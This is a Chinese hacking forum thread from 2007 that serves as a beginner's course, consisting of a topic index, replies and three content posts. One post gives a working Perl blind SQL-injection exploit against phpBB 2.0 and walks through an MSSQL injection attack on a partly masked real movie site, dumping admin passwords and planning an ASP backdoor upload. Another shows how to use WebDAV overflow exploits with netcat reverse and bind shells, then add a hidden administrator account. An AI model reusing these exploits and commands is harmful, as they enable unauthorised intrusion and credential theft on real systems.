菜鸟到黑客的捷径 网络知识大总结  看不懂别怪我

社区服务
高级搜索
猴岛论坛电脑百科菜鸟到黑客的捷径 网络知识大总结  看不懂别怪我
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
85个回复

菜鸟到黑客的捷径 网络知识大总结  看不懂别怪我

楼层直达
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看楼主 使用道具 楼主   发表于: 2007-11-16 0
— 本帖被 tmd88600 执行取消置顶操作(2008-04-27) —
终于做完了哈,希望给大家一些启示........(偶可能有点错误,大家请见谅!!)大家可以回帖子了!!
以下是偶总结的总目录,学习资料在目录下面以跟帖方式连载
基本技能........................................................................................2楼
黑客初级技术讲解(上)..........................................................3楼
黑客初级技术讲解(中)..........................................................4楼
黑客初级技术讲解(下)..........................................................5楼
基础知识(1)..............................................................................6楼
基础知识(2/3)..........................................................................7楼
基础知识(4/5)..........................................................................8楼
基础知识(6)..............................................................................9楼
黑客兵器之木马篇(上)........................................................10楼
黑客兵器之木马篇(下)........................................................11楼
黑客兵器之扫描篇(上)........................................................12楼
黑客兵器之扫描篇(下)........................................................13楼
*****、肉鸡、跳板的概念........................................................14楼
网络监听概念..............................................................................15楼
系统进程信息..............................................................................16楼
端口全解析(上/下)...............................................................17楼
端口详细说明表(上).......................................................18/19楼
端口详细说明表(下).......................................................20/21楼
菜鸟进阶(1)............................................................................22楼
...........................
菜鸟进阶(9)...........................................................................30楼
木马防范及一些端口的关闭(上/下).................................31楼
SSL.TLS.WTLS原理(上/下)................................................32楼
术语表  ................................................................................33~37楼
个人电脑安全.............................................................................38楼
网络安全知识(1~4)..............................................................39楼
........................
网络安全知识(7)..................................................................42楼
防范非系统用户破坏................................................................43楼
黑客扫描特征及易受攻击端口...............................................44楼
开始..运行..命令集合................................................................44楼
PING命令及使用技巧...............................................................45楼

GHOST详细解说(1).............................................................46楼.

GHOST详细解说(2).............................................................47楼
GHOST详细解说(3).............................................................48楼
ipc$详细解说大全(1/2).......................................................49楼
..............................
ipc$详细解说大全(5)...........................................................52楼
I P C $ 入 侵图文结合..............................................................52楼
常见ASP脚本攻击及防范技巧...............................................53楼
37秒迅速破解网吧....................................................................54楼
开启3389的5种方法(上)......................................................55楼
开启3389的5种方法(下)......................................................56楼
网络常见攻击及防范手册(上)..........................................57楼
网络常见攻击及防范手册(下)..........................................58楼
DOS攻击原理及方法介绍.......................................................59楼
如何突破各种防火墙...............................................................60楼
蠕虫技术(上)........................................................................61楼
蠕虫技术(中)........................................................................62楼
蠕虫技术(下)........................................................................63楼
壳(上).....................................................................................64楼
壳(下).....................................................................................65楼
简单黑客工具使用...................................................................66楼
浅谈绑定之应用........................................................................67楼
永远的后门.................................................................................68楼
入门者如何获得肉鸡...............................................................69楼
流光的使用方法.......................................................................70楼
溢出专集....................................................................................71楼
NET START可以起用命令一览表(上/下)......................72楼
PHP注入实例 .....................................................................73楼
[ 此贴被tmd88600在2008-01-16 00:00重新编辑 ]
4165412

ZxID:1007894

等级: 列兵
举报 只看该作者 85楼  发表于: 2008-04-21 0
很全 谢谢了 !!!!!
zxc520_h

ZxID:1220217

等级: 中校
: 抹 花 事 未 ろ 旳.

举报 只看该作者 84楼  发表于: 2008-04-04 0
  晕.
  我只回C语言.
悲伤。
 
弥漫开来 …
一凤凰一

ZxID:1380590

等级: 少尉
举报 只看该作者 83楼  发表于: 2008-03-18 0
滿困難的.....
blzqliu_h

ZxID:1360125

等级: 中校
大家一起玩哦    (*^__^*)

举报 只看该作者 82楼  发表于: 2008-02-28 0
哇,一定要好好学习学习哦。。。。。
2langshen

ZxID:1360325

等级: 上士
举报 只看该作者 81楼  发表于: 2008-02-26 0
不是一般的不懂...!是一点都不懂..............
awpexpert

ZxID:1269607

等级: 元老

举报 只看该作者 80楼  发表于: 2008-02-11 0
改天慢慢看
fzin

ZxID:1195879

等级: 新兵
举报 只看该作者 79楼  发表于: 2008-02-07 0
謝謝了
-.愛瘋樂。

ZxID:1334708

等级: 准尉
   人非商品,何需说明。
举报 只看该作者 78楼  发表于: 2008-01-11 0
狠严重的说
┆  ミ `  灬                                                                    ┆
┆━┏┛┃                                                                      ┆
┊━┏┛┃          :QianG |->Stef< V*:                            ┆
│..┏ ┃┃┃        ┗- ―‥-―‥-―‥- ┛                              │
│━━┛━┛ ▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁..│
└───ˊ我非偀雄.廣目無雙.我夲壞蛋,無限囂張︷.`───┘

           
awpexpert

ZxID:1269607

等级: 元老

举报 只看该作者 77楼  发表于: 2008-01-11 0
厉害 学习了
花香、中寂寞

ZxID:1085167

等级: 上将
天使工作室 1.314*

举报 只看该作者 76楼  发表于: 2008-01-11 0
  晕  还有这么好的东东哦  嘿嘿
[img=240,240]http://www.91fl.net/data/attachment/forum/201107/22/105552t8s4337hmottmypp.jpg[/img]www.91fl.net
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 75楼  发表于: 2008-01-11 0
看来此帖是沉了。。。。
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 74楼  发表于: 2007-11-17 0
怎么光看没顶啊啊啊啊啊啊啊啊                    
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 73楼  发表于: 2007-11-16 0
PHP注入实例

在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ││ isset($HTTP_POST_VARS<pOST_FORUM_URL]) )
{
$forum_id = ( isset($HTTP_GET_VARS<pOST_FORUM_URL]) ) ? intval($HTTP_GET_VARS<pOST_FORUM_URL]): intval

($HTTP_POST_VARS<pOST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = '';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话,相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话,就会使$result为空,于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长,就不全贴出来了,有兴趣的可以自已看看,关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE)),同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
valueS ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__,

$sql);
}


在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数,插入的不是整数当然就要出错了,于是就显示Error creating new session : session_begin,就表明你猜对了第一位了,其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功,看来出错信息也很有帮助啊.分析就到这里,下面附上一段测试代码,这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件,中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************
";
print " phpbb viewforum.php exp
";
print " code by pinkeyes
";
print " www.icehack.com
";
print " ************************
";
print "please enter the weak file's url:
";
print "e.g. http://192.168.1.4/phpBB2/viewforum.php
";
$adr=<STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack
";
$u=<STDIN>;
chomp($u);
print "work starting,please wait!
";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$j<=32;$j++){
for ($i=0;$i<@pink;$i++){
$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwd
";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luck
";}
else{
print "bad luck,work failed!
";}

至于以前的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了。

主要是看过程,学习作者思维!
SQL注入新技巧


SQL注入的新技巧
表名和字段名的获得
适用情况:
1)数据库是MSSQL
2)连接数据库的只是普通用户
3)不知道ASP源代码

可以进行的攻击
1)对数据内容进行添加,查看,更改

实例:
本文件以
http://www.dy***.com/user/wantpws.asp
为列进行测试攻击。

第一步:
在输入用户名处输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 ''' 之前有未闭合的引号。

/user/wantpws.asp,行63

说明没有过滤单引号且数据库是MSSQL.

第二步:
输入a';use master;--
显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e21'
多步 OLE DB 操作产生错误。如果可能,请检查每个 OLE DB 状态值。没有工作被完成。

/user/wantpws.asp,行63
这样说明没有权限了。

第三步:
输入:a' or name like 'fff%';--
显示有一个叫ffff的用户哈。

第四步:
在用户名处输入
ffff' and 1<>(select count(email) from [user]);--
显示:
Microsoft OLE DB Provider for SQL Server 错误 '80040e37'
对象名 'user' 无效。

/user/wantpws.asp,行96

说明没有叫user的表,换成users试试成功,同时说明有一个叫email的列.
(东方飘云的一个办法是输入a' having 1=1--
一般返回如下也就可以直接得到表名和一个字段名了
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.ID' 在选择列表中无效,因为该列未包含在聚合函数中,并且没有 GROUP BY 子句。

/user/wantpws.asp,行63


)

现在我们知道了ffff用户的密码是111111.

下面通过语句得到数据库中的所有表名和字段名。

第五步:
输入:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
说明:
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
同上可知id是:581577110
由于对象标志id是根据由小到大排列的所以我们可以得到所有的用户表的名字了
象下面这样就可以得到第二个表的名字了
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--

ad 581577110
users 597577167
buy 613577224
car 629577281
learning 645577338
log 661577395
movie 677577452
movieurl 693577509
password 709577566
type 725577623
talk

经过一段时间的猜测后我们得到上面的分析一下应该明白password,users是最得要的

第六步:猜重要表的字段
输入:
现在就看看users表有哪些字段
ffff';update [users] set email=(select top 1 col_name(object_id('users'),3) from users) where name='ffff';--
得到第三个字段是password
ffff';update [users] set email=(select top 1 col_name(object_id('users'),4) from users) where name='ffff';--
得到第四个字段是name
最后users表的字段共28个全得到了
(注:另一个得到字段的办法,前提是系统的返回出错信息
a' group by ID having 1=1--
得到
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.userid' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
这个第二个字段就是userid
显示第三个字段。
a' group by id,userid having 1=1--

Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
列 'users.password' 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。

/user/wantpws.asp,行63
得到是password
同理,一直显示出所有。:)
)

users表
1 2 3 4
id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note


starlook--12 10 2003 2:41PM
nlook---0
nos---2 登陆次数
date--12 10 2003 12:00AM 注册时间?
money--同上
send--空
oklook--0
dnlook--0
getmoney--0
state--0
note--这家伙很。。。 说明

password表
1 2 3
id name pwd

然后我又试ad原来是用来记录广告击点的。。
然后又试password表得到有name和pwd字段。
执行
ffff';update [users] set email=(select top 1 name from password) where name='ffff';--
可得第一个用户名是admin123看样儿多半是管理员了。
然后又得到了密码是dy***dick188还是打星号算了哈哈...

这样我们就完全进入了这个电影网站的后台了哈哈。
http://www.dy***.com/login.asp

再进一步还可以知道管理员一共有三人密码也都能看到了。
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--


只是能免费看电影好象还不够哈..我看了看它的后台管理原来在
添加电影的地方对于上传的图片没有过滤.asa的文件,这样我就
能上传一个asp后门并执行.


(全文完)如果有人不明白.......
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 72楼  发表于: 2007-11-16 0
NET START可以起用命令一览表


Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"

Net start DHCP Client
启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。
net start "dhcp client"

Net start Directory Replicator
启动“目录复制程序”服务。“目录复制程序”服务将指定的文件复制到指定服务器上。两
个词组成的服务名,例如 Directory Replicator,必须两边加引号 (")。也可以用命令 net
start replicator 启动该服务。
net start "directory replicator"

Net start Eventlog
启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记
录的事件之前启动该服务。
net start Eventlog

Net start File Server for Macintosh
启动 Macintosh 文件服务,允许 Macintosh 计算机使用共享文件。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "file service for macintosh"
Net start FTP Publishing Service
启动 FTP 发布服务。该命令只有在安装了 Internet 信息服务后才可用。
net start "ftp publishing service"
Net start Gateway Service for NetWare
启动 NetWare 网关服务。该命令只有在安装了 NetWare 网关服务的情况下才能在 Windows
2000 Server 上可用。
net start "gateway service for netware"
Net start Lpdsvc
启动 TCP/IP 打印服务器服务。该命令只有在 UNIX 打印服务和 TCP/IP 协议安装后方可使
用。
net start lpdsvc

Net start Messenger
启动“信使”服务。“信使”服务允许计算机接收邮件。
net start messenger

Net start Microsoft DHCP Service
启动 Microsoft DHCP 服务。该命令只有在运行 Windows 2000 Server 并且已安装 TCP/IP
协议和 DHCP 服务的情况下才可用。
net start "microsoft dhcp service"

Net start Net Logon
启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。
两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net
start netlogon 启动。
net start "net logon"

Net start Network DDE
启动“网络 DDE”服务。
net start "network dde"
Net start NT LM Security Support Provider
启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序”
后才可用。
net start "nt lm security support provider"
Net start OLE
启动对象链接和嵌入服务。
net start ole
Net start Print Server for Macintosh
启动 Macintosh 打印服务器服务,允许从 Macintosh 计算机打印。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "print server for macintosh"
Net start Remote Access Connection Manager
启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access connection manager"
Net start Remote Access ISNSAP Service
启动“远程访问 ISNSAP 服务”。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access isnsap service"
Net start Remote Procedure Call (RPC) Locator
启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。
net start "remote procedure call (rpc) locator"

Net start Remote Procedure Call (RPC) Service
启动“远程过程调用 (RPC) 服务”。“远程过程调用 (RPC) 服务”是 Microsoft Windows
2000 的 RPC 子系统。RPC 子系统包括终结点映射器和其他各种 RPC 服务。
net start "remote procedure call (rpc) service"

Net start Schedule
启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。
net start schedule

Net start Server
启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。
net start server

Net start Simple TCP/IP Services
启动“简单 TCP/IP 服务”服务。该命令只有在安装了 TCP/IP 和“简单 TCP/IP 服务”后
才可以使用。
net start "simple tcp/ip services"
Net start Site Server LDAP Service
启动“Site Server LDAP 服务”。“Site Server LDAP 服务”在 Windows 2000 Active D
irectory 中发布 IP 多播会议。该命令只有在安装了“Site Server LDAP 服务”后才可以使
用。
net start "site server ldap service"

Net start SNMP
启动 SNMP 服务。SNMP 服务允许服务器向 TCP/IP 网络上的 SNMP 管理系统报告当前状态。
该命令只有在安装了 TCP/IP 和 SNMP 后才可以使用。
net start snmp

Net start Spooler
启动“后台打印程序”。
net start spooler
Net start TCP/IP NetBIOS Helper
在 TCP 服务上启用 Netbios 支持。该命令只有在安装了 TCP/IP 才可用。
net start "tcp/ip netbios helper"
Net start UPS
启动“不间断电源 (UPS)”服务
net start ups

Net start Windows Internet Name Service
启动“Windows Internet 命名服务”。该命令只有在安装了 TCP/IP 和“Windows Interne
t 命名服务”后在 Windows 2000 Servers 上才可以使用。
net start "windows internet name service"

Net start Workstation
启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。
net start workstation
Net start Schedule
有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!
Net start Telnet
启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找
吧!
net start workstation
打开NET USE
net start lanmanserver
打开 IPC 服务。
开FTP命令是:net start msftpsvc
Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"
tmd88600

ZxID:1279065

等级: 贵宾
配偶: 琳儿来也
人生还是一张白纸~
举报 只看该作者 71楼  发表于: 2007-11-16 0
溢出专集


2003年3月18日,微软发布MS03-007号安全公告:Microsoft IIS 5.0 WebDAV远程溢出漏洞,声称利用此漏洞溢出后可以得到localsystem权限,于是网上沸沸扬扬开始关注起此漏洞。到了3月下旬,发现此漏洞的老外发布了他的exploit,不过由于这个exploit是针对英文版的win2000的,所以对国内造成的影响不大。直至3月27日,国内某黑客在安全焦点上公布了其修改后的针对中文版win2000的此漏洞的exploit程序,于是第二天即3月28日,国内的各个黑客网站都纷纷提供了编译好的win平台下的WebDAV漏洞溢出攻击程序的下载,各个安全论坛便随处可见关于WebDAV远程溢出攻击的讨论,甚至更有甚者把溢出攻击过程做成了动画教程供人观摩,WebDAV漏洞溢出攻击在一夜之间"迅速走红"。而且,其攻击代码在3月29日时又被人改进,使其成功率又大幅提高,眼下WebDAV远程溢出攻击已经成为各种黑客最流行的攻击方法,其来势之迅速之猛烈是以前Unicode、printer等漏洞所不及,而且有被蠕虫制造者利用的可能,所以笔者认为有必要写此文章让广大网管和用户尽早了解这个漏洞情况及解决方案,以提高警惕、做好防范。
一、 漏洞基本情况
1、 漏洞名称及描述
名称:Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞
微软安全公告:MS03-007
Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
地址http://www.microsoft.com/technet/security/bulletin/MS03-007.asp
描述:IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞
对WebDAV进行缓冲区溢出攻击,可能以Web进程权限在系统上执行任意指令。
2、 受影响系统



Microsoft IIS 5.0
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP3
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP2
- Microsoft Windows 2000 Professional/Server/
Datacenter Server SP1
- Microsoft Windows 2000 Professional/Server/
Datacenter Server



3、 什么是WebDAV组件
Microsoft IIS 5.0 (Internet Information Server 5)是Microsoft Windows 2000自带的一个网络
信息服务器,其中包含HTTP服务功能。IIS5默认提供了对WebDAV的支持,WebDAV(基于Web的分布式写作和改写)是一组对HTTP协议的扩展,它允许用户协作地编辑和管理远程Web服务器上的文件。使用WebDAV,可以通过HTTP向用户提供远程文件存储的服务,包括创建、移动、复制及删除远程服务器上的文件,但是作为普通的HTTP服务器,这个功能不是必需的。
4、 漏洞产生的原因
这个漏洞产生的原因具体是由于WebDAV使用了ntdll.dll中的一些API函数,而这些函数存在一个缓
冲区溢出漏洞,而Microsoft IIS 5.0带有WebDAV组件对用户输入的传递给ntdll.dll程序处理的请求未作充分的边界检查,远程入侵者可以通过向WebDAV提交一个精心构造的超长的数据请求而导致发生缓冲区溢出,成功利用这个漏洞可以获得LocalSystem权限,这意味着入侵者可以获得主机的安全控制能力。所以确切地说,这个漏洞并不是IIS造成的,而是ntdll.dll里面的一个API函数造成的。也就是说,很多调用这个API的应用程序都存在这个漏洞。
5、 测试代码:见附件
WebDAV远程缓冲区溢出漏洞的基本情况我们这里介绍到这里了,如果读者有兴趣想进一步了解这个漏
洞具体的溢出原理分析,建议可以去安全焦http://www.xfocus.net/中参阅isno写的两篇关于WebDAV远程溢出漏洞分析的文章,很精彩!我这里就不班门弄斧了。
二、如何检测漏洞
在上面介绍漏洞基本情况的时候,我们已经说了IIS 5.0的默认配置是提供了对WebDAV的支持,也就是说,如果你的win 2000提供了IIS服务而没有打过针对此漏洞的补丁,那么一般情况下你的IIS就会存在这个漏洞,但如何来确定呢?我们可以借助一些工具来帮我们进行检测。
1、 第一个检测工具:Ptwebdav.exe
下载地址http://www.ttian.net/txt/show.php?id=10
简介:Ptwebdav.exe是一个老外写的专门用来远程检测Windows 2000 IIS 5.0服务器是否存在WebDAV
远程缓冲区溢出漏洞的东东,其操作界面非常简单,只要在其"IP or hostname"中填入要检测的主机和IIS服务端口,然后按"check"就可以了。笔者正用它来检测本地主机是否存在WebDAV漏洞,一会儿它就会在下面窗口里显示结果。这个工具不错,但它每次只能检测一台机子,如果你想检测一个网段内所有主机就比较麻烦了,一台台地检测不知道要检测到什么时候。让我们来看看第二个检测软件,它能帮我们解决这个问题。
2、 第二个检测工具:WebDAVScan v1.0
下载地址http://www.cnhonker.net/Down/show.php?id=65&;;down=1
简介:WebDAVScan是一个专门用于检测网段内的Microsoft IIS 5.0服务器是否提供了对WebDAV的
支持的扫描器,软件非常小,只有7.23KB,而且是个绿色软件,无须安装,直接运行即可!扫描后如有此安全漏洞,软件会自动生成扫描报告,原来也是老外写的,不过我们这里用的是WebDAVScan的汉化版。笔者扫描X.X.23.1-X.X.23.254的网段大概用了30秒时间,速度很快,窗口右边显示的是结果,"Enable"表示了此IIS支持WebDAV,至于有没有漏洞要看它有没有打过补丁了。经笔者测试,这个软件确实很不错,推荐大家使用,好了,WebDAV的检测也介绍完了,下面我们开始讲利用此漏洞测试攻击了。
二、 漏洞测试攻击
自从WebDAV的exploit代码出现后,网上紧接着就出现了好几种版本的溢出攻击程序,虽然其核心
代码类似,但具体的功能和操作还是有些区别的,我们这里来了解两个WebDAV的溢出攻击程序。
1、 第一个溢出程序:wb.exe
下载地址http://www.longker.com/txt/opensoft.asp?soft_id=131&;;url=1
简介:wb.exe是一个win32平台下已经编译好的针对英文版的IIS--webdav远程溢出攻击
程序,原代码的作者是Crpt的kralor,使用时行用Netcat在本地监听某个端口,如nc -L -p 666,然后使用此程序对远程主机进行溢出攻击,溢出成功后就能在本地监听口上获取远程主机的反向连接,获取localsystem权限的cmdshell,它需要指定远程主机反向连接主机IP、端口、补丁信息等参数:syntax: c:\K_WEBDAV.EXE<victim_host><your_host><your_port>[padding],如wb targetserver.com your_ip 666 3 ,攻击如果成功,那Netcat的监听窗口就会出现远程主机的shell。
2、 第二个溢出程序:webdavx.exe
下载地址http://www.longker.dom/txt/opensoft.asp?soft_id=135&;;url=1
简介:webdavx.exe是一个针对中文版server溢出程序,它是根据安全焦点Isno的perl代码编译成
的,这个版本只对中文版的有效,它的使用也不同于wb.exe,它溢出成功后直接在目标主机的7788端口上捆定一个localsystem权限的cmdshell,不像wb.exe需要反向连接,入侵者只要telnet到7788端口就可以了,所以用它在局域网内也能对局域网的主机进行攻击,当然wb.exe使用反向连接也有它的好处,因为许多WEB服务器的防火墙都设置为只允许通过到端口80的TCP连接,这样即使开了7788端口你也连接不上,而使用反向连接可以突破防火墙的TCP过滤,所以这两个软件各有用处各有特点,可以根据不同的需要进行选择。
3、 测试攻击实例
虽然讲了两个攻击软件的用法,但都只是纸上谈兵,我们还是来实际测试一下这个漏洞的威力如何!
我们测试的是中文版的IIS主机,使用的扫描软件是WebDAVScan的汉化版,攻击软件是webdavx.exe,为了输入方便,我把webdavx.exe改名为web.exe,在刚才介绍WebDAVScan 的时候我们已经扫描到的IIS支持WebDAV的主机中选一台,找开CMD,输入:



c:\web 2x..x.23.68
send buffer…(正在溢出)

telnet target 7788(溢出完成,请尝试telnet连接目标主机的7788端口)

c:\telnet 2x..x.23.68 7788
正在连接到2x..x.23.68…
Microsoft Windows 2000[Version 5.00.2195]

<C>版权所有制1985-2000Microsoft Corp
c:\winnt\system32> (溢出成功,已经连接到其7788端口)



当然事情上溢出不一定成功,如果telnet连接提示失败就说明溢出可能不成功,这里是笔者N次试验的结果,不过现在webdavx.exe的溢出代码重新进行了改进,其溢出成功率大幅提高,估计在1/2左右。而且得到的应该是system权限,比超级用户还高一级,可以加个administrator组的成员来试试:
c:\winnt\system32>net user hacker 111111 /add
The command completed successfully
C:\winnt\system32>net localgroup administrators hacker /add
The command completed successfully
